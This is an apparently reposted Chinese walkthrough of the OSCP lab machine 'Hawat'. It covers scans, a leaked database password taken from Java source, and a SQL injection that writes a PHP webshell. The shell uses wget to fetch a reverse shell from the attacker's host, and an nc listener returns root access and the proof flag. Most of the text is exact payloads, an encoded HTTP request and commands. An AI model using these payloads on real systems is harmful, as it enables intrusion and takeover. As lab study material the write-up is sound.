本文主要是介绍OSCP靶场--Hawat,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
OSCP靶场–Hawat
考点(目录扫描+zip文件下载+java代码审计+web1的sql注入写到web2的webshel)
1.nmap扫描
##
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.158.147 -sV -sC -Pn --min-rate 2500 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-11 07:18 EDT
Nmap scan report for 192.168.158.147
Host is up (0.23s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
| 3072 78:2f:ea:84:4c:09:ae:0e:36:bf:b3:01:35:cf:47:22 (RSA)
| 256 d2:7d:eb:2d:a5:9a:2f:9e:93:9a:d5:2e:aa:dc:f4:a6 (ECDSA)
|_ 256 b6:d4:96:f0:a4:04:e4:36:78:1e:9d:a5:10:93:d7:99 (ED25519)
111/tcp closed rpcbind
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
17445/tcp open unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-US
| Date: Thu, 11 Apr 2024 11:19:48 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <title>Issue Tracker</title>
| <link href="/css/bootstrap.min.css" rel="stylesheet" />
| </head>
| <body>
| <section>
| <div class="container mt-4">
| <span>
| <div>
| href="/login" class="btn btn-primary" style="float:right">Sign In</a>
| href="/register" class="btn btn-primary" style="float:right;margin-right:5px">Register</a>
| </div>
| </span>
| <br><br>
| <table class="table">
| <thead>
| <tr>
| <th>ID</th>
| <th>Message</th>
| <th>P
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET,HEAD,OPTIONS
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Length: 0
| Date: Thu, 11 Apr 2024 11:19:48 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Thu, 11 Apr 2024 11:19:49 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
30455/tcp open http nginx 1.18.0
|_http-title: W3.CSS
|_http-server-header: nginx/1.18.0
50080/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
|_http-title: W3.CSS Template
| http-methods:
|_ Potentially risky methods: TRACE2.user priv
2.1 目录扫描&简单java代码审计
## 3个web端口目录扫描:
##################
##
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.158.147:17445/
[08:25:04] 200 - 1KB - /login
[08:25:05] 302 - 0B - /logout -> http://192.168.158.147:17445/index
[08:25:21] 200 - 2KB - /register Task Completed##########
##
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.158.147:30455/
[08:24:38] 301 - 169B - /4 -> http://192.168.158.147:30455/4/
[08:25:29] 200 - 3KB - /index.php
[08:25:50] 200 - 67KB - /phpinfo.php Task Completed##################
##
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.158.147:50080/
[08:25:07] 301 - 239B - /4 -> http://192.168.158.147:50080/4/
[08:25:49] 301 - 243B - /cloud -> http://192.168.158.147:50080/cloud/
[08:25:49] 302 - 0B - /cloud/ -> http://192.168.158.147:50080/cloud/index.php/login
[08:25:58] 403 - 994B - /error/
[08:26:03] 301 - 244B - /images -> http://192.168.158.147:50080/images/
[08:26:03] 200 - 1KB - /images/
[08:26:04] 200 - 9KB - /index.html Task Completed ######################
## 访问后跳转:admin:admin弱密码登陆:http://192.168.158.147:50080/cloud/index.php/login
################
## 解压后正则过滤:password等关键字:
┌──(root㉿kali)-[~/Downloads/issuetracker]
└─# grep password -r ./*
./mvnw: wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath"
./src/main/java/com/issue/tracker/users/UserDetailsServiceImpl.java: //change here to store encoded password in db
./src/main/java/com/issue/tracker/users/UserDetailsServiceImpl.java: .password(users.getPassword())
./src/main/java/com/issue/tracker/users/Users.java: private String password;
./src/main/java/com/issue/tracker/users/Users.java: return password;
./src/main/java/com/issue/tracker/users/Users.java: public void setPassword(String password) {
./src/main/java/com/issue/tracker/users/Users.java: this.password = password;
./src/main/java/com/issue/tracker/issues/IssueController.java: connectionProps.put("password", "ManagementInsideOld797");
./src/main/java/com/issue/tracker/config/WebSecurityConfig.java: auth.userDetailsService(userDetailsService).passwordEncoder(bCryptPasswordEncoder);
./src/main/resources/templates/user_form.html: <input th:field="*{password}" type="password" class="form-control"/>
./src/main/resources/templates/login.html: <input th:field="*{password}" type="password" class="form-control"/>
./src/main/resources/application.properties:spring.datasource.password=ManagementInsideOld797
./src/main/resources/static/js/jquery-3.4.1.js:for ( i in { radio: true, checkbox: true, file: true, password: true, image: true } ) {
./src/main/resources/static/js/jquery-3.4.1.js: password: null,
./src/main/resources/static/js/jquery-3.4.1.js: options.password#################
## ssh登陆失败:
user issue_user
password ManagementInsideOld797########################
##
发现sql注入,发现webroot:尝试sql注入写webshell:
2.2 sql注入写入webshell:
## payload
priority=Normal' UNION SELECT (<?php echo exec($_GET["cmd"]);) INTO OUTFILE '/srv/http/cmd.php'; --## url编码:
https://www.urlencoder.org/
##
## 下一步是让代码执行。使用之前从phpinfo.php文件中提取的详细信息,我们知道 PHP 服务器的 Web 根目录,我们可以在其中编写反向 shell 有效负## 载。
$_SERVER['DOCUMENT_ROOT'] /srv/http## 让我们测试一下,我们将使用以下简单的 webshell。
<?php echo exec($_GET["cmd"]);## 最终的有效负载将如下所示。
priority=Normal' UNION SELECT (<?php echo exec($_GET["cmd"]);) INTO OUTFILE '/srv/http/cmd.php'; -- ## 使用URL Encoder这样的工具,我们将字符串编码为 URL 兼容。
## https://www.urlencoder.org/## 请注意,有效负载末尾有一个尾随空格。让我们使用 Burp 运行此查询。
Normal%27+UNION+SELECT+%27%3C%3Fphp+echo+exec%28%24_GET%5B%22cmd%22%5D%29%3B%27+INTO+OUTFILE+%27%2Fsrv%2Fhttp%2Fcmd.php%27%3B+--+## burp重放:url编码时候不对空格编码
POST /issue/checkByPriority?priority=Normal%27+UNION+SELECT+%27%3C%3Fphp+echo+exec%28%24_GET%5B%22cmd%22%5D%29%3B%27+INTO+OUTFILE+%27%2Fsrv%2Fhttp%2Fcmd.php%27%3B+--+ HTTP/1.1
Host: 192.168.158.147:17445
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=E408CE3E9BBBEC15DCAD194F380E68A9
Upgrade-Insecure-Requests: 1## 如果一切顺利,我们可以确认该文件已创建(我们会记住泄漏phpinfo.php文件的 Web 服务器位于端口 30455)
kali@kali:~$ curl "http://192.168.158.147:30455/cmd.php?cmd=id" ##############
##
2.3 反弹交互式shell:
##
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php## 修改webshell的反弹iphe端口:
http://192.168.158.147:30455/cmd.php?cmd=wget%20http://192.168.45.195:443/lrshell.php%20-O%20/srv/http/lrshell.php### kali:
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
192.168.158.147 - - [11/Apr/2024 11:05:18] "GET /lrshell.php HTTP/1.1" 200 -## 浏览器访问:
http://192.168.158.147:30455/lrshell.php#######
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443
listening on [any] 443 ...
192.168.158.147: inverse host lookup failed: Unknown host
connect to [192.168.45.195] from (UNKNOWN) [192.168.158.147] 43712
Linux hawat 5.10.14-arch1-1 #1 SMP PREEMPT Sun, 07 Feb 2021 22:42:17 +0000 x86_64 GNU/Linux15:06:07 up 3:50, 0 users, load average: 0.05, 0.04, 0.00
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
sh: cannot set terminal process group (1838): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.1# whoami
whoami
root
sh-5.1# cat /root/proof.txt
cat /root/proof.txt
9643c700b5e14b23afb54d4293548a99
sh-5.1# 
3. root priv
4.总结:
##
https://medium.com/@blueclps080984/proving-grounds-hawat-easy-linux-box-walkthrough-a-journey-to-offensive-security-cc24110b246f这篇关于OSCP靶场--Hawat的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
![BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin](https://i-blog.csdnimg.cn/direct/ed45c0efd0ac40c68b2c1bc7b6d90ebc.png)
